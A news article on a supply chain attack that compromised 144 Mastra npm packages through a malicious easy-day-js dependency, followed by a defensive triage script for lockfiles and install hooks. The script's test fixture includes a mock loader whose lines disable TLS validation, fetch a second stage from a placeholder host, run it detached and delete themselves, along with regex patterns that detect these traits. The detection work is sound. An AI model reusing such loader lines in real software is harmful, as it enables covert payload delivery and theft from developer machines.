144 Mastra npm packages hit by supply chain attack

At least 144 npm packages tied to the Mastra namespace were compromised in a supply chain attack in June 2026, according to a technical analysis by Endor Labs. The campaign added a malicious dependency to widely used packages, including @mastra/core, which has more than 918,000 weekly downloads.

KEY FACTS

  • Scope: 144 @mastra packages were affected during an 88-minute publishing window.
  • Entry point: the malicious code arrived through a third-party dependency named easy-day-js.
  • Delivery: the payload ran during postinstall and fetched a second stage from attacker-controlled infrastructure.
  • Impact: the malware could steal browser data and cryptocurrency wallet information and install persistence on Windows, macOS, and Linux.
  • Account abuse: the attack used the ehindero npm account, which previously had access to the Mastra scope.

According to the report, the affected Mastra packages themselves contained no malicious code. Instead, the added dependency carried an obfuscated loader that disabled TLS certificate validation, downloaded a second-stage payload, and then deleted itself to limit forensic traces.

SafeDep said the easy-day-js package began as a clean clone of the dayjs date library before malicious changes were added on June 17, 2026. The disclosure said the final-stage malware could harvest browser history, collect data from more than 160 cryptocurrency wallet browser extensions, and receive commands from a command-and-control server.

JFrog said the campaign combined a decoy package, a postinstall loader, runtime payload download, detached execution, self-deletion, and remote module execution. The malicious versions were later removed from npm and the latest dist-tag was reverted.

StepSecurity said Mastra packages are often installed in environments that hold sensitive credentials, which increases the value of the ecosystem as a target. The company also said any workstation, CI runner, or build environment that installed affected versions should be treated as potentially compromised.
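The loader traits described above (a postinstall hook, TLS validation disabled, a runtime download, detached execution, self-deletion) and the advice to treat any host that installed the affected versions as compromised translate into a concrete triage: find out whether the dependency ever landed in a lockfile, which package pulled it in, and whether an installed package combines an install-time hook with loader-like code. The script below is an added example written for this article, not code from Endor Labs, SafeDep, JFrog, StepSecurity or the Mastra project. The lockfile, package.json, version strings and the mock loader source are constructed fixtures (only the name easy-day-js comes from the reports), and the indicator regexes are assumed heuristics, not signatures of the real payload.

```javascript
"use strict";
// Added example, not code from Endor Labs, SafeDep, JFrog, StepSecurity or
// the Mastra project. Offline triage of an npm install against the loader
// traits the reports describe. Fixtures below are constructed mocks and the
// indicator regexes are assumed heuristics, not signatures of easy-day-js.

// Walk a lockfile v2/v3 "packages" map and return every installed copy of
// `name` together with the packages that depend on it (how it arrived).
function findInstalled(lock, name) {
  const entries = Object.entries(lock.packages || {});
  const dependents = entries
    .filter(([, meta]) => meta.dependencies && name in meta.dependencies)
    .map(([p]) => (p === "" ? lock.name || "<root>" : p.replace(/^.*node_modules\//, "")));
  return entries
    .filter(([p]) => p !== "" && p.endsWith(`node_modules/${name}`))
    .map(([p, meta]) => ({ path: p, version: meta.version, dependents }));
}

// Lifecycle hooks that run on `npm install` without the consumer calling anything.
const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];
function lifecycleScripts(packageJson) {
  const scripts = packageJson.scripts || {};
  return LIFECYCLE_HOOKS.filter((h) => typeof scripts[h] === "string")
    .map((h) => ({ hook: h, command: scripts[h] }));
}

// Heuristic indicators (assumed, not taken from the reports) for the traits
// the reports list. Each alone is common in legitimate code; the combination
// inside an install hook is what makes a package worth pulling off the host.
const INDICATORS = [
  { id: "tls-validation-disabled", re: /NODE_TLS_REJECT_UNAUTHORIZED\s*=\s*['"]?0|rejectUnauthorized\s*:\s*false/ },
  { id: "runtime-download", re: /\b(https?\.(get|request)|fetch)\s*\(/ },
  { id: "detached-exec", re: /detached\s*:\s*true|\.unref\s*\(\s*\)/ },
  { id: "self-delete", re: /unlink(Sync)?\s*\(\s*__filename/ },
  { id: "obfuscation", re: /eval\s*\(|new\s+Function\s*\(|\\x[0-9a-f]{2}\\x[0-9a-f]{2}/i },
];
function scanSource(source) {
  return INDICATORS.filter((i) => i.re.test(source)).map((i) => i.id);
}

// installed: { name: { packageJson, source } } as read from node_modules.
// Flag a package only when it both runs at install time and shows loader traits.
function assessInstall(lock, installed) {
  const findings = [];
  for (const [name, { packageJson, source }] of Object.entries(installed)) {
    const hooks = lifecycleScripts(packageJson);
    const indicators = scanSource(source);
    if (hooks.length > 0 && indicators.length > 0) {
      findings.push({
        name,
        hooks: hooks.map((h) => h.hook),
        indicators,
        reachedVia: findInstalled(lock, name).flatMap((hit) => hit.dependents),
      });
    }
  }
  return { suspect: findings.length > 0, findings };
}

// --- constructed fixtures (versions are placeholders, not the affected releases) ---
const LOCK = {
  name: "demo-app",
  lockfileVersion: 3,
  packages: {
    "": { name: "demo-app", dependencies: { "@mastra/core": "0.0.0-example" } },
    "node_modules/@mastra/core": { version: "0.0.0-example", dependencies: { "easy-day-js": "0.0.0-example" } },
    "node_modules/easy-day-js": { version: "0.0.0-example" },
  },
};
// Mock loader exhibiting the reported traits; this is not the real malware.
const MOCK_LOADER = [
  "process.env.NODE_TLS_REJECT_UNAUTHORIZED = '0';",
  "const https = require('https');",
  "https.get('https://example.invalid/stage2', (res) => { /* write stage2.js */ });",
  "require('child_process').spawn(process.execPath, ['stage2.js'], { detached: true, stdio: 'ignore' }).unref();",
  "require('fs').unlinkSync(__filename);",
].join("\n");
const CLEAN_SOURCE = "module.exports = require('dayjs');";
const INSTALLED = {
  "easy-day-js": {
    packageJson: { name: "easy-day-js", scripts: { postinstall: "node setup.js" } },
    source: MOCK_LOADER,
  },
};

console.log(JSON.stringify(assessInstall(LOCK, INSTALLED), null, 2));
```

On a real host you would feed `findInstalled` the parsed package-lock.json of each project and CI checkout, and `assessInstall` the package.json and entry file of any package it returns; a hit is a reason to rotate every credential that host could reach, not just to remove the package.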

WHY IT MATTERS

The incident shows how a single package account and a small dependency change can expose large numbers of downstream installs, because install-time scripts run before developers ever execute the code they pulled in. Systems that installed the affected versions may need rollback, credential rotation, and host review to reduce risk.